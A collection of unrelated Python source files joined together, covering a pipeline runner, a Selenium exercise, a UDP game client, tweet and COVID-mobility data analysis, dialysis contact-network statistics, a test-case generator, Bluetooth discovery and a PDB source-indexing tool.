state.updateBatchState()
if batchState['pipeline_state'] == RUN_PIPELINE_STATE:
_log(batchState, 'Pipeline is in RUN_PIPELINE state')
pipeline = yield pipelines_client.runPipeline(host='localhost',
clusterName=batchState['pipeline_config']['cluster.CLUSTER_NAME'],
userName='guest',
parentPipeline=batchState['pipeline_name'],
bareRun=True,
queue=state.innerPipelineQueue(),
config=batchState['pipeline_config'],
overwrite=True)
batchState['pipeline_task'] = pipeline['task_name']
yield _updateTask(batchState,
lambda t : t.addMessage(tasks.task.MSG_SILENT,
'Completed run pipeline'
).progress())
batchState['pipeline_state'] = RUNNING_PIPELINE_STATE
state.updateBatchState()
if batchState['pipeline_state'] == RUNNING_PIPELINE_STATE:
_log(batchState, 'Pipeline is in RUNNING_PIPELINE state')
_monitorPipeline(batchState)
yield _waitForPipeline(batchState)
yield _updateTask(batchState,
lambda t : t.addMessage(tasks.task.MSG_SILENT,
'Completed running pipeline'
).progress())
batchState['pipeline_state'] = POSTRUN_STATE
state.updateBatchState()
if batchState['pipeline_state'] == POSTRUN_STATE:
_log(batchState, 'Pipeline is in POSTRUN state')
yield state.postrunQueue.addWithDeferred(workflow_runner.run,
state.workflowConfig(),
batchState['pipeline_config']['pipeline.POSTRUN_TEMPLATE_XML'],
pipelineConfigFile,
TMP_DIR)
yield _updateTask(batchState,
lambda t : t.addMessage(tasks.task.MSG_SILENT,
'Completed postrun'
).progress())
batchState['pipeline_state'] = COMPLETED_STATE
batchState['state'] = COMPLETED_STATE
state.updateBatchState()
yield _updateTask(batchState,
lambda t : t.setState(tasks.task.TASK_COMPLETED))
_log(batchState, 'Pipeline finished successfully')
def _runWrapper(state, batchState):
batchState.setdefault('retry_count', RETRIES)
d = _run(state, batchState)
@defer.inlineCallbacks
def _errback(f):
_log(batchState, 'There was an error in the pipeline, setting to failed')
log.err(f)
batchState['state'] = FAILED_STATE
yield _updateTask(batchState,
lambda t : t.setState(tasks.task.TASK_FAILED))
state.updateBatchState()
batchState['retry_count'] -= 1
if batchState['retry_count'] > 0:
yield run(state, batchState)
else:
# Since we are giving up, reset the counter so the next time we are called
# we will retry again
batchState['retry_count'] = RETRIES
state.updateBatchState()
defer.returnValue(f)
d.addErrback(_errback)
return d
def run(state, batchState):
_delayAutoshutdown(state, batchState)
return _runWrapper(state, batchState)
|
from selenium import webdriver
from selenium.webdriver.support.ui import Select
import time
import math
import os
try:
link = "http://suninjuly.github.io/redirect_accept.html"
browser = webdriver.Chrome()
browser.get(link)
btn1 = browser.find_element_by_css_selector('button')
btn1.click()
browser.switch_to.window(browser.window_handles[1])
x_el = browser.find_element_by_css_selector('[id="input_value"]')
x = int(x_el.text)
z = str(math.log(abs(12*math.sin(x))))
inpt = browser.find_element_by_css_selector('[id="answer"]')
inpt.send_keys(z)
# Отправляем заполненную форму
button = browser.find_element_by_css_selector("button.btn")
button.click()
finally:
# ожидание чтобы визуально оценить результаты прохождения скрипта
time.sleep(10)
# закрываем браузер после всех манипуляций
browser.quit()
|
#Gonna try and rewrite James' network class, so I can use scriptwars in Python
#Built by Jonathan Mace
#With James Brown watching over my shoulder like the beautiful coding angel he is
import socket
import struct
#I'm going to try and just bytes() this at the end before sending
#Though might need something more fancier, like start off with a byte array or smthng
dataOut = bytearray()
dataIn = []
#I feel like I shouldn't do this?
#Sets some global variables
ID = 0
bit = 0x100
positionOfByte = 0
IP = '52.65.69.217'
def connect(netID, ip, name):
global ID
global sock
global IP
global dataOut
#sendString(name)
ID = netID
IP = ip
protocol = netID >> 16 & 0xff
if protocol == 1:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print("Unable to connect!")
elif protocol == 2:
try:
print("TCP shit. as yet, not done")
except:
print("Unable to connect!")
else:
print("Invalid ID")
#Create the string shit to send
dataOut = buildDataOut(ID, name)
def nextTick():
global dataOut
global dataIn
sock.sendto(bytearray(dataOut), (IP, 35565))
dataOut = bytearray()
dataOut += (ID).to_bytes(4,'big')
dataIn = sock.recv(1024)
if dataIn == '':
return False
global position
position = 0
#Get the first byte and see if there are errors
errors = {1:"DISCONNECTED: The connection was terminated by the end of the game",
2: "FAILED_TO_KEEP_UP: The connection was terminated because the we couldn't keep up with the game tick"
}
headerByte = getByte()
if headerByte in [1,2]:
print("Error: {}".format(errors[headerByte]))
return False
elif headerByte == 255:
print("Error: ", end = '')
print(getString())
return False
elif headerByte == 0:
return True
else:
print("I told you James I should put this in here")
print("There's been a header byte we didn't plan for")
print("Please call your nearest James")
return False
return dataIn != ''
#Converts a string (or number or whatever) into a list of its characters. as bytes!!
#Then adds it to data out
def sendString(name):
global dataOut
dataOut += (len(bytes(name, 'utf-8'))).to_bytes(2,'big')
dataOut += bytearray(name, 'utf-8')
def sendByte(byte):
global dataOut
dataOut += byte.to_bytes(1,'big')
def sendInt(i):
global dataOut
dataOut += i.to_bytes(4,'big')
def sendFloat(f):
global dataOut
data += struct.pack('>f', f)
def sendData(data):
global dataOut
dataOut += data
#This adds your personal ID to the dataOut
def putHeader(ID):
dataOut.append(ID)
return
#Adds the ID to the start of the dataOut; something needed for every packet
def add_id(ID):
dataOut.append(ID.to_bytes(4,'big'))
'''
#this is debugging shit. ignore.
#sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#sock.connect((ip, 35565))
def sendstuff():
global sock
global IP
sock.sendto(x, (IP, 35565))
data = sock.recv(1024)
print(data)
'''
#First packet has just name
#This is first thing sent, dataOut does not yet have ID added to it
#So we need to add ID first
def buildDataOut(ID, name):
x = bytearray(ID.to_bytes(4,'big'))
x+= (len(bytes(name, 'utf-8'))).to_bytes(2,'big')
x += bytearray(name, 'utf-8')
return x
'''
* Gets a single byte from the data. This byte is returned as an integer in the
* range 0-255
* @return An integer containing the read byte.
*/
'''
def getByte():
global position
b = dataIn[position]
position += 1
return b
def getInt():
global position
i = struct.unpack('>i', dataIn[position: position + 4])[0]
position += 4
return i
def getString():
global position
length = struct.unpack('>h', dataIn[position:position+2])
position += 2
string = dataIn[position: position + length]
return string.decode()
def getBoolean():
global bit
global positionOfByte
global position
if(bit == 0x100 or positionOfByte != position - 1):
bit = 1
positionOfByte = position
position += 1
currentByte = dataIn[positionOfByte]
boolean = (currentByte & bit) != 0
bit <<= 1
return boolean
def getFloat():
global position
struct.unpack('>f', dataIn[position])
position += 4
def getData():
global dataOut
return dataOut
def getPointer():
global position
return position
def movePointer(n=1):
global position
position += n
def hasData():
global dataOut
return position < len(dataOut)
'''
To write code:
while nextTick()
then James said it should do everything you expect it to
'''
|
# Quick and dirty preprocessing of the tweet dfs: remove unrecognized languages, newline characters and hyperlinks
import pandas as pd
import os
from tqdm import tqdm
path = 'data/raw'
files = os.listdir(path)
tweets = sorted([i for i in files if 'Coronavirus Tweets' in i])
allowed_langs = ['en', 'es', 'fr', 'de', 'it', 'pt', 'ar', 'hi', 'ja', 'ko', 'zh', 'zh-TW']
total_removed = 0
for file in tqdm(tweets):
df = pd.read_csv(os.path.join(path, file))
l = len(df)
# remove all tweets in languages that aws can't recognize
df = df[df.lang.isin(allowed_langs)]
total_removed += l - len(df)
# remove newline characters
df.text = df.text.apply(lambda x: x.replace('\n', ' '))
df.text = df.text.apply(lambda x: x.replace('\r', ' '))
df.text = df.text.apply(lambda x: x.replace('\t', ' '))
df.text = df.text.apply(lambda x: x.replace(' ', ' '))
# move hyperlinks into separate column
df.text = df.text.apply(lambda x: x.split(' '))
df['hyperlink'] = df.text.apply(lambda x: (', ').join([i for i in x if i.startswith('https://')]))
# make separate hashtags column but keep them in the text (won't catch hashtags that aren't preceeded by spaces)
df['hashtag'] = df.text.apply(lambda x: (', ').join([i for i in x if i.startswith('#')]))
# make separate mentions column bu tkeep them in the text (won't catch at-mentions whtat aren't preceeded by spaces)
df['mention'] = df.text.apply(lambda x: (', ').join([i for i in x if i.startswith('@')]))
df.text = df.text.apply(lambda x: (' ').join([i for i in x if not i.startswith('https://')]))
date = file.split(' ')[0]
df.to_csv(os.path.join('data/preprocessed', date + '.csv'))
print('Preprocessed {} files. Removed {} tweets due to language constraints.'.format(len(tweets), total_removed)) |
"""
Author: Hankyu Jang
Email: hankyu-jang@uiowa.edu
Last Modified: Aug, 2020
Description: This script generates network statistics
"""
import argparse
# import igraph
import pandas as pd
import numpy as np
from graph_statistics import *
import networkx as nx
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Dialysis Unit')
parser.add_argument('-day', '--day', type=int, default=10,
help= 'day of csv file that contains the latent positions of hcws')
parser.add_argument('-d', '--contact_distance', type=int, default=6,
help= 'distance threshold (in feet)')
args = parser.parse_args()
day = args.day
contact_distance = args.contact_distance
# Load Patient arrays
npzfile = np.load("contact_data/patient_arrays_day{}_{}ft.npz".format(day, contact_distance))
hcw_patient_contact = npzfile["hcw_patient_contact_arrays"]
patient_patient_contact = npzfile["patient_patient_contact_arrays"]
npzfile.close()
simulation_period = hcw_patient_contact.shape[0]
# Load HCW arrays (note that there are 5 array. we're using only hcw_hcw_contact here.)
npzfile = np.load("contact_data/hcw_arrays_day{}_{}ft.npz".format(day, contact_distance))
hcw_hcw_contact = npzfile["hcw_hcw_contact"]
npzfile.close()
# Make hcw_hcw_contact in the same shape as other contact arrays, then zero out the contacts on Sunday
hcw_hcw_contact = np.repeat(np.expand_dims(hcw_hcw_contact, axis=0), simulation_period, axis=0)
hcw_hcw_contact[6,:,:,:] = 0
hcw_hcw_contact[13,:,:,:] = 0
hcw_hcw_contact[20,:,:,:] = 0
hcw_hcw_contact[27,:,:,:] = 0
hcw_hcw = hcw_hcw_contact.sum(axis=(0,-1))
hcw_patient = hcw_patient_contact.sum(axis=(0,-1))
patient_patient = patient_patient_contact.sum(axis=(0,-1))
n_hcw = hcw_patient.shape[0]
n_patient = hcw_patient.shape[1]
n_patient_MWF = n_patient // 2
n_total = n_hcw + n_patient
A = np.zeros((n_total, n_total)).astype(int)
A[:n_hcw, :n_hcw] = (hcw_hcw + hcw_hcw.T)
A[:n_hcw, n_hcw:n_total] = hcw_patient
A[n_hcw:n_total, :n_hcw] = hcw_patient.T
A[n_hcw:n_total, n_hcw:n_total] = (patient_patient + patient_patient.T)
G = nx.from_numpy_matrix(A, parallel_edges=False)
n, m, k_mean, k_max, std, cc, c, assortativity, n_giant, m_giant = generate_graph_statistics(G)
# Set node attributes
attrs = {}
for i in range(n_hcw):
attrs[i] = {"type": 'HCP'}
for i in range(n_hcw,n_total):
attrs[i] = {"type": 'patient'}
nx.set_node_attributes(G, attrs)
# Prepare a table on estra statistics.
index_list = ["overall degree", "overall weighted degree", "HCP degree", "HCP weighted degree", "patient degree", "patient weighted degree", "HCP-HCP edge weight", "HCP-patient edge weight", "patient-patient edge weight"]
column_name = ["mean", "std", "max"]
statistic_array = np.zeros((len(index_list), len(column_name)))
# degree
degree_dict = dict(G.degree)
degree_array = np.array(list(degree_dict.values()))
statistic_array[0] = [np.mean(degree_array), np.std(degree_array), np.max(degree_array)]
print("Overall")
print("degree. mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(degree_array), np.std(degree_array), np.max(degree_array)))
#weighted degree
weighted_degree_dict = dict(G.degree(weight='weight'))
weighted_degree_array = np.array(list(weighted_degree_dict.values()))
statistic_array[1] = [np.mean(weighted_degree_array), np.std(weighted_degree_array), np.max(weighted_degree_array)]
print("weighted degree. mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(weighted_degree_array), np.std(weighted_degree_array), np.max(weighted_degree_array)))
print("weighted degree (hrs/day). mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(weighted_degree_array)* 8 / 60 / 60 / 26, np.std(weighted_degree_array)* 8 / 60 / 60 / 26, np.max(weighted_degree_array)* 8 / 60 / 60 / 26))
#degree and weighted degree, just of HCPs
print()
print("HCP")
HCP_degree_array = degree_array[:n_hcw]
HCP_weighted_degree_array = weighted_degree_array[:n_hcw]
statistic_array[2] = [np.mean(HCP_degree_array), np.std(HCP_degree_array), np.max(HCP_degree_array)]
statistic_array[3] = [np.mean(HCP_weighted_degree_array), np.std(HCP_weighted_degree_array), np.max(HCP_weighted_degree_array)]
print("HCP_degree. mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_degree_array), np.std(HCP_degree_array), np.max(HCP_degree_array)))
print("HCP_weighted_degree. mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_weighted_degree_array), np.std(HCP_weighted_degree_array), np.max(HCP_weighted_degree_array)))
print("HCP_weighted_degree (hrs/day). mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_weighted_degree_array)* 8 / 60 / 60 / 26, np.std(HCP_weighted_degree_array)* 8 / 60 / 60 / 26, np.max(HCP_weighted_degree_array)* 8 / 60 / 60 / 26))
#degree and weighted degree, just of patients
print()
print("patient")
patient_degree_array = degree_array[n_hcw:]
patient_weighted_degree_array = weighted_degree_array[n_hcw:]
statistic_array[4] = [np.mean(patient_degree_array), np.std(patient_degree_array), np.max(patient_degree_array)]
statistic_array[5] = [np.mean(patient_weighted_degree_array), np.std(patient_weighted_degree_array), np.max(patient_weighted_degree_array)]
print("patient_degree. mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(patient_degree_array), np.std(patient_degree_array), np.max(patient_degree_array)))
print("patient_weighted_degree. mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(patient_weighted_degree_array), np.std(patient_weighted_degree_array), np.max(patient_weighted_degree_array)))
print("patient_weighted_degree (hrs/day). mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(patient_weighted_degree_array)* 8 / 60 / 60 / 26, np.std(patient_weighted_degree_array)* 8 / 60 / 60 / 26, np.max(patient_weighted_degree_array)* 8 / 60 / 60 / 26))
# preprocess for edge weights
HCP_HCP_edge_weights = []
HCP_patient_edge_weights = []
patient_patient_edge_weights = []
for edge in G.edges:
if edge[0] < n_hcw and edge[1] < n_hcw:
HCP_HCP_edge_weights.append(G.edges[edge]["weight"])
elif edge[0] >= n_hcw and edge[1] >= n_hcw:
patient_patient_edge_weights.append(G.edges[edge]["weight"])
else:
HCP_patient_edge_weights.append(G.edges[edge]["weight"])
#mean, max, std dev of weight of HCP-HCP edges
print()
print("weight of HCP-HCP edges")
HCP_HCP_edge_weights = np.array(HCP_HCP_edge_weights)
statistic_array[6] = [np.mean(HCP_HCP_edge_weights), np.std(HCP_HCP_edge_weights), np.max(HCP_HCP_edge_weights)]
print("mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_HCP_edge_weights), np.std(HCP_HCP_edge_weights), np.max(HCP_HCP_edge_weights)))
print("(hrs/day) mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_HCP_edge_weights)* 8 / 60 / 60 / 26, np.std(HCP_HCP_edge_weights)* 8 / 60 / 60 / 26, np.max(HCP_HCP_edge_weights)* 8 / 60 / 60 / 26))
#mean, max, std dev of weight of HCP-patient edges
print()
print("weight of HCP-patient edges")
HCP_patient_edge_weights = np.array(HCP_patient_edge_weights)
statistic_array[7] = [np.mean(HCP_patient_edge_weights), np.std(HCP_patient_edge_weights), np.max(HCP_patient_edge_weights)]
print("mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_patient_edge_weights), np.std(HCP_patient_edge_weights), np.max(HCP_patient_edge_weights)))
print("(hrs/day) mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_patient_edge_weights)* 8 / 60 / 60 / 26, np.std(HCP_patient_edge_weights)* 8 / 60 / 60 / 26, np.max(HCP_patient_edge_weights)* 8 / 60 / 60 / 26))
#mean, max, std dev or weight of patient-patient edges
print()
print("weight of patient-patient edges")
patient_patient_edge_weights = np.array(patient_patient_edge_weights)
statistic_array[8] = [np.mean(patient_patient_edge_weights), np.std(patient_patient_edge_weights), np.max(patient_patient_edge_weights)]
print("mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(patient_patient_edge_weights), np.std(patient_patient_edge_weights), np.max(patient_patient_edge_weights)))
print("(hrs/day) mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(patient_patient_edge_weights)* 8 / 60 / 60 / 26, np.std(patient_patient_edge_weights)* 8 / 60 / 60 / 26, np.max(patient_patient_edge_weights)* 8 / 60 / 60 / 26))
df_additional_statistics = pd.DataFrame(data=statistic_array, index=index_list, columns=column_name)
df_additional_statistics.to_csv("tables/statistics/additional_network_statistics.csv")
|
def print_menu(APP_NAME):
print(f'''
Welcome to {APP_NAME}!
____
| _ \ /\
| |_) | _ __ ___ __ __ / \ _ __ _ __
| _ < | '__|/ _ \ \ \ /\ / / / /\ \ | '_ \ | '_ \
| |_) || | | __/ \ V V / / ____ \ | |_) || |_) |
|____/ |_| \___| \_/\_/ /_/ \_\| .__/ | .__/
| | | |
|_| |_|
Please select an option by entering a number
\t[1] Display Names on your Table
\t[2] Display Drinks Menu
\t[3] Display Preferences
\t[4] Add People
\t[5] Add Drink
\t[6] Set a Preference
\t[7] Order a Round
\t[8] Close Application
''')
def table(title, data): #Prints out table of data
width = get_width(title, data)
banner = (f" +{'=' * width}+")
print(f"{banner}\n |{title.upper()}{' ' * (width - len(title))}| \n{banner}")
for item in data:
print(f" |{item}{' ' * (width - len(item))}|" )
print(f"{banner}\n")
def get_width(title, data):
longest = len(title)
for item in data:
if len(item) > longest:
longest = len(item)
return longest + 1
def long_table(title, data):
width = get_width(title, data)
banner = (f" +{'=' * width}+")
print(f"{banner}\n |{title.upper()}{' ' * (width - len(title))}|\n{banner}")
for key, value in data.items():
print(f" |{key}: {value}{' ' * (width - len(value) - len(key)-2)}|")
print(f"{banner}\n") |
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 07 11:54:54 2019
@author: bmdoekemeijer
"""
import numpy as np
import time
import os
import sys
sys.path.insert(0, 'bin')
from mergeVTKs import averageCellDataSliceDataInst
# Read all files
averaging_lb = 10400; # Lower limit
averaging_ub = np.Inf; # Upper limit
folderName = 'sdn_yaw<yaw1>_yaw<yaw2>'
sliceDataInstDir = '/marconi_scratch/userexternal/bdoekeme/sediniCases/neutral_runs/runs/' + folderName + '/postProcessing/sliceDataInstantaneous'
averageCellDataSliceDataInst(sliceDataInstDir,averaging_lb,averaging_ub) |
class StartPage:
_skip_button = ".//android.widget.Button[@text = 'SKIP']"
def get_skip_button(self):
return self._skip_button
|
"""
Kara Shibley and Griffin Reichmuth
CSE 160 AC
This file plots various sections of the data and runs a random forest
regressor to predict county level movement.
"""
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.ensemble.forest import RandomForestRegressor
import plotly.express as px
# Import data and keep columns for retail data
data = pd.read_csv("features_labels_rf")
data = data.drop(['Unnamed: 0',
'grocery_and_pharmacy_percent_change_from_baseline',
'parks_percent_change_from_baseline',
'transit_stations_percent_change_from_baseline',
'workplaces_percent_change_from_baseline',
'residential_percent_change_from_baseline'], axis=1)
rec_retail = 'retail_and_recreation_percent_change_from_baseline'
groc_pharm = 'grocery_and_pharmacy_percent_change_from_baseline'
parks = 'parks_percent_change_from_baseline'
transit = 'transit_stations_percent_change_from_baseline'
workplaces = 'workplaces_percent_change_from_baseline'
residential = 'residential_percent_change_from_baseline'
# Plot all the data
all_counties = px.line(data, x="date", y=rec_retail, color="County name",
line_group="County name", hover_name="County name")
all_counties.show()
# Plot data based on feature importance
gov_plot = px.scatter(data, x="date", y=rec_retail,
color='g_Candidate_Jay Inslee',
color_continuous_scale=[(0, "red"), (1, "blue")],
hover_name="County name",
title="Gubernatorial Race")
gov_plot.show()
pres_plot = px.scatter(data, x="date", y=rec_retail,
color='p_Candidate_Donald J. Trump / Michael R. Pence',
color_continuous_scale=[(0, "blue"), (1, "red")],
hover_name="County name",
title="Presidential Race")
pres_plot.show()
# data for US and WA
us_data = pd.read_csv("US")
wa_mobility = us_data[us_data["sub_region_1"] == 'Washington']
us_data['date'] = pd.to_datetime(us_data['date'])
wa_mobility['date'] = pd.to_datetime(wa_mobility['date'])
# Sort data by movement type and find the daily average movement
# from the baseline by grouping by date
# recreation and retail
rec_retail_us = us_data.groupby("date")[rec_retail].mean()
rec_retail_wa = wa_mobility.groupby("date")[rec_retail].mean()
# grocery and pharmacy
groc_pharm_us = us_data.groupby("date")[groc_pharm].mean()
groc_pharm_wa = wa_mobility.groupby("date")[groc_pharm].mean()
# parks
parks_us = us_data.groupby("date")[parks].mean()
parks_wa = wa_mobility.groupby("date")[parks].mean()
# transit
transit_us = us_data.groupby("date")[transit].mean()
transit_wa = wa_mobility.groupby("date")[transit].mean()
# workplaces
workplaces_us = us_data.groupby("date")[workplaces].mean()
workplaces_wa = wa_mobility.groupby("date")[workplaces].mean()
# residential
residential_us = us_data.groupby("date")[residential].mean()
residential_wa = wa_mobility.groupby("date")[residential].mean()
# plot mobility data US vs WA
fig, [[ax1, ax2, ax3], [ax4, ax5, ax6]] = \
plt.subplots(2, figsize=(25, 15), ncols=3)
rec_retail_wa.plot(x='date', y=rec_retail, legend=True, label="WA", ax=ax1)
rec_retail_us.plot(x='date', y=rec_retail, legend=True, label="US", ax=ax1)
ax1.set_title('Recreation and Retail Percent Change from Baseline')
groc_pharm_wa.plot(x='date', y=groc_pharm, legend=True, label="WA", ax=ax2)
groc_pharm_us.plot(x='date', y=groc_pharm, legend=True, label="US", ax=ax2)
ax2.set_title('Grocery and Pharmacy Percent Change from Baseline')
parks_wa.plot(x='date', y=parks, legend=True, label="WA", ax=ax3)
parks_us.plot(x='date', y=parks, legend=True, label="US", ax=ax3)
ax3.set_title('Parks Percent Change from Baseline')
transit_wa.plot(x='date', y=transit, legend=True, label="WA", ax=ax4)
transit_us.plot(x='date', y=transit, legend=True, label="US", ax=ax4)
ax4.set_title('Transit Percent Change from Baseline')
workplaces_wa.plot(x='date', y=workplaces, legend=True, label="WA", ax=ax5)
workplaces_us.plot(x='date', y=workplaces, legend=True, label="US", ax=ax5)
ax5.set_title('Workplace Percent Change from Baseline')
residential_wa.plot(x='date', y=residential, legend=True, label="WA", ax=ax6)
residential_us.plot(x='date', y=residential, legend=True, label="US", ax=ax6)
ax6.set_title('Residential Percent Change from Baseline')
plt.savefig("US vs. WA.png")
# Set date as the index
data['date'] = pd.to_datetime(data['date'])
data = data.set_index('date')
train_dates = data.loc["2020-03-23": '2020-04-13'].drop("County name", axis=1)
test_dates = data.loc["2020-04-27": '2020-05-18'].drop("County name", axis=1)
# Random Forest model
RF_Model = RandomForestRegressor(n_estimators=100,
max_features=1, oob_score=True)
# RF for group 2
features_train = train_dates.loc[:, train_dates.columns != rec_retail]
labels_train = train_dates[rec_retail]
rgr = RF_Model.fit(features_train, labels_train)
features_test = test_dates.loc[:, test_dates.columns != rec_retail]
labels_test = test_dates[rec_retail]
rgr_predict = rgr.predict(features_test)
rgr_error = abs(rgr_predict - labels_test)
print(rgr_error)
print(rgr_error.mean())
|
import random
import os
try:
# Create target Directory
os.mkdir("testcases")
except FileExistsError:
pass
os.system("g++ code/sol.cpp -o sol.out")
UPPER = 2**31 - 1
LOWER = -2**31
for i in range(1, 21):
fin = os.path.join("testcases", f"{i}.in")
fout = os.path.join("testcases", f"{i}.out")
a = random.randint(LOWER, UPPER)
b = random.randint(LOWER, UPPER)
if not LOWER <= a + b <= UPPER:
print("YEAHHH")
with open(fin, "w") as f:
print(a, b, file=f)
os.system(f"./sol.out < {fin} > {fout}")
os.system("rm sol.out") |
import bluetooth
print "looking for nearby devices..."
nearby_devices = bluetooth.discover_devices(lookup_names = True)
print "found %d devices" % len(nearby_devices)
for addr, name in nearby_devices:
print " %s - %s" % (addr, name)
|
#!/usr/bin/env python3
#
#-------------------------------------------------------------------------------
import argparse
import datetime
import os
import re
import shutil
import sys
import textwrap
import time
import libSrcTool
import prepPDB
import simur
MY_NAME = os.path.basename(__file__)
DEFAULT_SRCSRV = 'C:/Program Files (x86)/Windows Kits/10/Debuggers/x64/srcsrv'
DESCRIPTION = f"""
Index the PDB files in the --target_dir, taking the information from the
{simur.VCS_CACHE_PATTERN} files found under the --processed_dir:s
--srcsrv_dir may for example be (if you have it on a server)
//seupp-s-rptmgr/ExternalAccess/IndexingServices/WinKit10Debuggers/srcsrv
or (if you have it locally)
C:/Program Files (x86)/Windows Kits/10/Debuggers/x64/srcsrv
"""
USAGE_EXAMPLE = f"""
Example:
> {MY_NAME} -t D:/src/rl78_trunk/rl78/intermediate/build_Win32_14
-p D:/src/rl78_trunk/core/ide/lib/Release
-s //seupp-s-rptmgr/ExternalAccess/IndexingServices/WinKit10Debuggers/srcsrv
"""
#-------------------------------------------------------------------------------
def parse_arguments():
parser = argparse.ArgumentParser(
MY_NAME,
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent(DESCRIPTION),
epilog=textwrap.dedent(USAGE_EXAMPLE)
)
add = parser.add_argument
add('-b', '--backup', action='store_true',
help='make a backup of the .pdb file as <path>.orig')
add('-c', '--cvdump_path', metavar='cvdump.exe',
default='cvdump.exe',
help='path to cvdump.exe (unless it is in the --srcsrv_dir directory)')
add('-d', '--debug_level', type=int, default=0, help='set debug level')
add('-l', '--lower_case_pdb', action='store_true',
help='handle old PDBs (< VS2019) that stored paths in lower case')
add('-p', '--processed_dir', metavar='processed-dir1{;dir2;dir4}',
help='fetch *.simur.json from preprocessed PDB directories')
add('-q', '--quiet', action='store_true',
help='be more quiet')
add('-s', '--srcsrv_dir', metavar='srcsrv',
default=DEFAULT_SRCSRV,
help='WinKits srcsrv directory')
add('-t', '--target_dir', metavar='stage-dir',
required=True,
help='root path to index (recursively)')
add('-u', '--under_test', metavar='the.pdb',
help='index only this pdb file')
add('-v', '--verbose', action='store_true',
help='be more verbose')
return parser.parse_args()
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def list_all_files(directory, ext):
the_chosen_files = []
for root, _dirs, files in os.walk(directory):
for file in files:
if file.endswith(ext):
the_chosen_files.append(os.path.join(root, file))
return the_chosen_files
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def filter_pdbs(pdbs, cvdump, srcsrv, options):
lib_pdbs = []
exe_pdbs = []
for pdb_file in pdbs:
# First exclude the default vcNNN.pdb files, they are from the compiler
internal_pdb = re.match(r'.*\\vc\d+\.pdb$', pdb_file)
if internal_pdb:
print(f'Skipping {pdb_file}')
continue
# First check if srctool returns anything - then it is NOT a lib-PDB
exe_files = prepPDB.get_non_indexed_files(pdb_file, srcsrv, options)
if exe_files:
exe_pdbs.append(pdb_file)
elif cvdump:
commando = [cvdump, pdb_file]
raw_data, _exit_code = simur.run_process(commando, True)
files = libSrcTool.process_raw_cvdump_data(raw_data)
# The .pdb contained source files, append it
if files:
lib_pdbs.append(pdb_file)
return lib_pdbs, exe_pdbs
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def accumulate_processed(options):
'''
Look up all files ending with VCS_CACHE_PATTERN ('.simur.json')
take out the contents and put in vcs_imports dictionary
'''
vcs_imports = {}
caching_files = []
roots = options.processed_dir.split(';')
for the_dir in roots:
simur_files = list_all_files(the_dir, simur.VCS_CACHE_PATTERN)
caching_files.extend(simur_files)
for cache_file in caching_files:
if options.verbose:
print(f'Take vcs exports from {cache_file}')
in_data = simur.load_json_data(cache_file)
vcs_imports.update(in_data)
return vcs_imports
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def get_available_bins(bins_in):
bins_found = []
bins_not = []
for the_bin in bins_in:
reply = shutil.which(the_bin)
if reply is None:
# Not in path, try once more in 'this' directory
this_dir = os.path.dirname(os.path.abspath(__file__))
reply = shutil.which(the_bin, path=this_dir)
if reply is None:
bins_not.append(the_bin)
else:
bins_found.append(reply)
return bins_found, bins_not
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def make_time_string(elapsed):
if elapsed > 60:
longer_time = datetime.timedelta(seconds=elapsed)
return str(longer_time)
return str(elapsed) + ' secs'
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def make_log(srcsrv, explicit_cvdump, elapsed):
bins_used = [
sys.executable,
os.path.join(srcsrv, 'srctool.exe'),
os.path.join(srcsrv, 'pdbstr.exe'),
]
maybe_bins = [
explicit_cvdump,
'git.exe',
'svn.exe',
'hg.exe'
]
found_bins, unfound_bins = get_available_bins(maybe_bins)
bins_used += found_bins
print(f'Executed by : {os.getenv("USERNAME")}')
print(f' on machine : {os.getenv("COMPUTERNAME")}')
print(f' SIMUR_REPO_CACHE: {os.getenv("SIMUR_REPO_CACHE")}')
print(f' elapsed time : {make_time_string(elapsed)}')
codepage, _exit_code = simur.run_process('cmd /c CHCP', False)
the_cp = re.match(r'^.*:\s+(\d*)$', codepage)
if the_cp:
codepage = the_cp.group(1)
print(f' CodePage : {codepage}')
print('Script:')
print(f' {os.path.realpath(sys.argv[0])}')
print('Using binaries:')
for the_exe in bins_used:
the_exe = os.path.join(srcsrv, the_exe)
print(f' {the_exe}:')
props = simur.getFileProperties(the_exe)
if props:
print(f' {props["StringFileInfo"]["FileVersion"]}')
print(f' {props["FileVersion"]}')
if unfound_bins:
print('Binaries not found/used:')
for the_exe in unfound_bins:
print(f' {the_exe}:')
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def main():
options = parse_arguments()
start = time.time()
root = options.target_dir
cvdump = options.cvdump_path
srcsrv = options.srcsrv_dir
debug_level = options.debug_level
if prepPDB.check_winkits(srcsrv, options):
return 3
found_cvdump = libSrcTool.check_cvdump(cvdump, srcsrv)
pdbs = list_all_files(root, ".pdb")
if len(pdbs) == 0:
print(f'No PDB:s found in directory {root}')
return 3
# If there is no cvdump, then we won't filter out any lib_pdb:s either
lib_pdbs, exe_pdbs = filter_pdbs(pdbs, found_cvdump, srcsrv, options)
